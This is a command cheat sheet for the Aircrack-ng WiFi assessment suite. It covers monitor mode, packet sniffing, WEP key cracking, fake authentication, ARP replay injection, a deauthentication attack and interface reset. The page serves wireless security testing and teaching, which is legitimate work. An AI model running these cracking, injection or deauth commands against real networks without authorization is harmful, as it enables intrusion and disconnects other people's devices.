Missing Logo

Aircrack-ng - WiFi network security assessment suite

ARP Check

CommandDescription
arp -aCheck for existing clients on the network

Monitor Mode

CommandDescription
airmon-ng start wlp3s0Put device in monitor mode (sometimes fails)
ifconfig wlp3s0 downAlternative: bring interface down first
iwconfig wlp3s0 mode monitorSet monitor mode manually
airodump-ng -c <ch>,<ch> wlp3s0Set channel
ifconfig wlp3s0 upBring interface back up
iwconfig wlp3s0Check if device is in monitor mode
airodump-ng wlp3s0Monitor for Access Points and Clients

Sniffing

CommandDescription
airodump-ng -c <ch> --bssid <MAC> -w dump wlp3s0Sniff IVs (40K-85K packets to crack WEP)

Cracking

CommandDescription
aircrack-ng -b <MAC> dump*.capCrack WEP key from packet dump
aircrack-ng -z <dump>Crack WEP key from Packet Injection

Packet Injection

CommandDescription
aireplay-ng --fakeauth 0 -e "<SSID>" -a <MAC> wlp3s0Fake authentication with AP
airodump-ng wlp3s0Find a connected client (once)
airodump-ng -c <ch> --bssid <MAC> -w dump wlp3s0Sniff for packets (continuous)
aireplay-ng --arpreplay -b <MAC> -h <client-MAC> wlp3s0Inject ARP packets to generate load
aireplay-ng --deauth 5 -a <MAC> -c <client-MAC> wlp3s0Deauth attack to force ARP packets

Reset

CommandDescription
ifconfig wlp3s0 downBring interface down
iwconfig wlp3s0 mode managedSet managed mode
ifconfig wlp3s0 upBring interface up
systemctl restart NetworkManagerRestart NetworkManager